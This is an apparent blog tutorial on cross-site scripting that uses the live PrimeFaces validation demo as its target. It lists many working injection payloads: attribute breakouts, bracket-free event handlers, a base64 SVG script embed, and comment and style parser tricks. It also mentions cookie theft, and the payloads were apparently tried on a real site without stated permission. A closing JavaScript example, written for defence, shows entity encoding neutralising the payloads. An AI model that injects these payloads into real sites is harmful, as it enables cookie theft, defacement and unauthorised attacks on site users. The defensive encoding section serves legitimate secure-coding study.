Hello everyone! Sometimes even professionals forget how to do a simple configuration, and we will take advantage of that to learn some Java hacking with a technique named XSS in a real JSF environment.
Primefaces.org is the site of the PrimeFaces JSF library, which is not only very popular but also very attractive visually. I was browsing the site looking for validation hints and realized the validation demo was vulnerable, so I decided to use it to learn the hacking technique called cross-site scripting (XSS) in a real environment.
The power of this type of attack resides in the fact that, when the injected data is stored, the code we introduced runs every time that data is displayed. The same injection point is just as useful when the payload is only reflected back in the response, as happens with a validation message that echoes what was submitted. Let's go to the examples.
With this vector we can, for example, obtain the cookies the site handles:
Or simply show an iframe (note that a sandbox granting both allow-same-origin and allow-scripts gives away most of the protection sandboxing is meant to provide):
"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://javapro.org/"></iframe>
We can also execute code from an HTML5 video object:
We can also generate a button and have the code we wish executed when it is clicked:
In the same way we can use a math object:
Math objects can also contain other executable objects:
From an embed element that loads and runs an SVG image (the base64 payload is the SVG document containing a script element):
"><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoImphdmFwcm8ub3JnIik7PC9zY3JpcHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
The last script produces exactly the same result as the preceding one.
Using the AJAX validation we can have the code execute as you type, by using the event attributes of the script tag (the FOR and EVENT attributes are an old Internet Explorer feature and are ignored by other browsers):
"><SCRIPT FOR=document EVENT=onreadystatechange>alert('javapro.org')</SCRIPT>
In a similar way we can modify the current label and have our code execute when the mouse passes over the label:
" onmouseover="alert('javapro.org')" >
Moreover, we don't even need angle brackets:
" onmouseover="alert;throw 1;"
We can also display a new page:
" onmouseenter="document.open();document.write('<html><body><p>JavaPro.org</p></body></html>');document.close();" >
We can produce a message followed by an error (alert returns undefined, so the assignment navigates to a relative URL named undefined, which normally ends in an error page):
" onmouseenter="document.location=alert('javapro.org')//" >
Or a redirect call, for example:
HTML comments are harmless, aren't they? NO! A comment ends at the first -->, so the second img tag is parsed and rendered:
<!--<img src="--><img src=x onerror=alert('javapro.org')//"-->
Taking advantage of a parsing bug (a filter that reads the markup differently from the browser does):
<![><img src="]><img src=x onerror=alert('javapro.org')//">
We can also obfuscate a bit and take advantage of parser differences: the browser treats everything up to </style> as raw stylesheet text, while a naive parser sees a single img with a quoted src attribute:
"><style><img src="</style><img src=x onerror=alert('javapro.org')//">
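To see why these payloads work and what the missing "simple configuration" changes, here is an added example (not code from the original post, nor from primefaces.org or PrimeFaces itself) that models the reflection sink behind them. A submitted value is echoed into an input's value attribute and into a validation message; the vulnerable branch echoes it raw, as an escape="false" misconfiguration on a JSF output component does, and the hardened branch applies HTML entity encoding of the kind JSF components perform by default. A small tokenizer then reports what each of the post's payloads turned into. The markup, element ids and message text are assumptions made for the example; the tokenizer only approximates a browser's parser.

```javascript
// Added example, not from the original post or from PrimeFaces: a model of the
// reflection sink behind the payloads above. Markup and ids are assumptions.

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Entity-encode the five characters that can change HTML structure.
function encodeForHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Hypothetical response of a validation demo: the value is reflected twice,
// once in an attribute context and once in a text context. escape=true is the
// default behaviour of JSF output components; escape=false is the misconfiguration.
function renderValidationForm(submitted, escape) {
  const v = escape ? encodeForHtml(submitted) : submitted;
  return `<input id="form:number" type="text" value="${v}" />` +
         `<span class="ui-message-error">${v} is not a number</span>`;
}

// Tokenize markup roughly the way a browser does: comments are removed first (a
// comment ends at the first "-->", which is why "<!--<img src=\"-->" is not
// harmless), then every start tag is collected together with its attributes.
const TAG_RE = /<([a-zA-Z][\w-]*)([^>]*)>/g;
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

function tokenize(html) {
  const withoutComments = html.replace(/<!--[\s\S]*?-->/g, '');
  const tags = [];
  TAG_RE.lastIndex = 0;
  let m;
  while ((m = TAG_RE.exec(withoutComments)) !== null) {
    const attrs = {};
    ATTR_RE.lastIndex = 0;
    let a;
    while ((a = ATTR_RE.exec(m[2])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// Report what a submission turned into: elements the template never contained,
// and attributes that register event handlers on any element.
function assess(submitted, escape) {
  const tags = tokenize(renderValidationForm(submitted, escape));
  const injectedElements = tags
    .filter((t) => t.name !== 'input' && t.name !== 'span')
    .map((t) => t.name);
  const handlers = [];
  for (const t of tags) {
    for (const name of Object.keys(t.attrs)) {
      if (name.startsWith('on')) handlers.push(`${t.name}@${name}`);
    }
  }
  return {
    elementCount: tags.length,
    injectedElements,
    handlers,
    safe: injectedElements.length === 0 && handlers.length === 0,
  };
}

// Three of the post's own payloads: attribute breakout into a new element,
// handler injection without angle brackets, and the comment trick.
const PAYLOADS = {
  iframe: '"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://javapro.org/"></iframe>',
  handler: '" onmouseover="alert;throw 1;"',
  comment: '<!--<img src="--><img src=x onerror=alert(\'javapro.org\')//"-->',
};

for (const [name, payload] of Object.entries(PAYLOADS)) {
  console.log(name, 'raw:', assess(payload, false));
  console.log(name, 'encoded:', assess(payload, true));
}
```

With the raw branch, the iframe payload yields two extra iframe elements (one per reflection), the bracket-free payload becomes an onmouseover attribute on the input itself, and the comment payload leaves an img element with an onerror handler once the comment is closed. With the encoded branch every payload stays inside the value attribute and the message text, which is all that default JSF escaping has to do to close the hole.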